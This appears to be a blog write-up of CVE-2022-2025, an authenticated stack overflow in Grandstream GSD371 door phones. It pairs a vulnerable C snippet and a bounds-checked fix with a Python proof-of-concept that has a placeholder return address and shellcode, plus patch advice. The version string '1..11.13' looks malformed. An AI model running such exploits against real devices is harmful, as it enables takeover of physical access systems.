In mid-2022, a critical security vulnerability was found in the Grandstream GSD371 IP video door system, specifically in firmware version 1..11.13. Registered as CVE-2022-2025, this flaw allows a remote attacker, armed with a valid username and password, to execute arbitrary code and gain full shell access. Below, we’ll break down the bug, show a proof-of-concept exploit, and explain the real risks in simple terms.
What Is Grandstream GSD371?
Grandstream’s GSD371 is a popular IP video door phone used in businesses and homes all over the world. It offers remote camera streaming, door control, and even integrations with other security devices.
- Firmware Affected: 1..11.13 (and possibly others)
- Prerequisite: Valid user credentials (username/password)
- Impact: Remote Code Execution (full root shell)
The root problem is that when the user submits a certain HTTP POST parameter, the firmware uses strcpy to move the value into a stack buffer. If the value is larger than the buffer, it can overwrite control structures on the stack—such as the return address—leading to execution of arbitrary code.
Take a look at the problematic code (simplified for clarity):

```c
#include <string.h>

// Hypothetical vulnerable function (simplified): the real handler copies a POST
// parameter into a fixed 128-byte stack buffer with no length check.
void vulnerable_function(char *input_param) {
    char buf[128];
    // No length checking! Dangerous!
    strcpy(buf, input_param); // writes past buf when input_param is longer than 127 bytes
    // ...
}
```
In the real device, this function is called upon a POST request to an endpoint such as /cgi-bin/do_modify_user. The backend simply grabs a parameter (let's call it username) and copies it, unchecked, into a 128-byte buffer.
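For contrast, here is the same handler shape with the copy bounds-checked, as an added example that is not the device's firmware code: the parameter is measured against the buffer before any copy and oversized input is rejected rather than truncated. The function names, the handler signature and the 512-byte test input are assumptions; only the 128-byte buffer and the username parameter come from the description above.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 128  /* same stack buffer size described for the vulnerable handler */

/* Bounded replacement for the strcpy call: copies input_param into dst only if it
 * (including its terminator) fits in dst_size bytes. Returns false otherwise, so
 * the caller can reject the request instead of truncating or overflowing. */
bool copy_param_checked(char *dst, size_t dst_size, const char *input_param) {
    if (dst == NULL || input_param == NULL || dst_size == 0)
        return false;
    /* Look for the terminator within the first dst_size bytes only; memchr stops
     * at the first match, so a short string is never scanned past its end. */
    const char *nul = memchr(input_param, '\0', dst_size);
    if (nul == NULL)
        return false;  /* no terminator within dst_size bytes: too long for buf */
    memcpy(dst, input_param, (size_t)(nul - input_param) + 1);
    return true;
}

/* Hypothetical hardened handler for the "username" parameter (assumption: the real
 * firmware's handler signature is not on the page). Returns 0 when the value was
 * accepted, -1 when it was rejected as oversized. */
int handle_modify_user(const char *username_param) {
    char buf[BUF_SIZE];
    if (!copy_param_checked(buf, sizeof buf, username_param)) {
        fprintf(stderr, "do_modify_user: rejected username longer than %d bytes\n", BUF_SIZE - 1);
        return -1;  /* answer HTTP 400 and log the event */
    }
    /* ... use buf, which is now guaranteed NUL-terminated and in bounds ... */
    return 0;
}

/* Constructed test input: a username made of input_len 'A' characters. */
int demo_result(size_t input_len) {
    char input[512];
    if (input_len >= sizeof input)
        return -2;
    memset(input, 'A', input_len);
    input[input_len] = '\0';
    return handle_modify_user(input);
}

int main(void) {
    printf("127 bytes: %d (accepted)\n", demo_result(127));
    printf("200 bytes: %d (rejected)\n", demo_result(200));
    return 0;
}
```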
CVE Record:
https://nvd.nist.gov/vuln/detail/CVE-2022-2025
Vendor Firmware Download:
https://www.grandstream.com/support/firmware
Related Exploit Discussion:
https://www.exploit-db.com/exploits/50876
Proof of Concept: Exploitation Steps
Precondition:
The attacker knows a valid username/password.
Step 1: Log In
Authenticate via the web interface or HTTP API and grab a session cookie.
Step 2: Craft Malicious Payload
You need to send a POST request to the vulnerable endpoint with an oversized parameter. The payload must:
- Overflow the buffer (send more than 128 bytes)
- Overwrite the function’s return address with your controlled address (pointing to shellcode or a ROP chain)
- Add shellcode (e.g., spawns a shell via system("/bin/sh"))
Example Python Exploit

```python
import requests

ip = "192.168.1.100"  # Target device IP
login_url = f"http://{ip}/cgi-bin/login"
exploit_url = f"http://{ip}/cgi-bin/do_modify_user"
username = "admin"
password = "password123"

# Step 1: Get session
session = requests.Session()
login_data = {"username": username, "password": password}
r = session.post(login_url, data=login_data)

# Step 2: Build overflow payload
bufsize = 128
eip = b"\x90\x90\x90\x90"  # Placeholder: overwrite with real address
shellcode = b"\x90" * 20  # NOP sled (add shellcode here)
payload = b"A" * bufsize + eip + shellcode

# Step 3: Send malicious payload
post_data = {"username": payload.decode('latin-1')}
resp = session.post(exploit_url, data=post_data)
print("Exploit sent, check your listener (e.g., netcat) for shell")
```
You’ll typically set up a netcat or Metasploit handler to catch the shell.
Note: In real-world exploitation, you’ll need to adjust eip to point to your shellcode or ROP chain, and ensure the device’s anti-exploit protections (like DEP or ASLR) are absent or bypassed. On the GSD371 (MIPS-based, no modern mitigations), this is trivial.
What This Means
With only a valid user and password, a remote attacker can own your GSD371—run their own code, install malware, listen in, or even open doors and stream feeds. Anyone using firmware 1..11.13 (or earlier) should update IMMEDIATELY.
Download the latest secure firmware from Grandstream:
Conclusion
CVE-2022-2025 is a real threat for anyone using affected Grandstream GSD371 door systems. With valid credentials, an attacker can achieve total takeover. Patch your devices, never reuse passwords, and firewall these devices from public networks.
Have questions or need help securing your IP devices? Let us know in the comments!
Timeline
Published on: 09/23/2022 16:15:00 UTC
Last modified on: 09/26/2022 22:37:00 UTC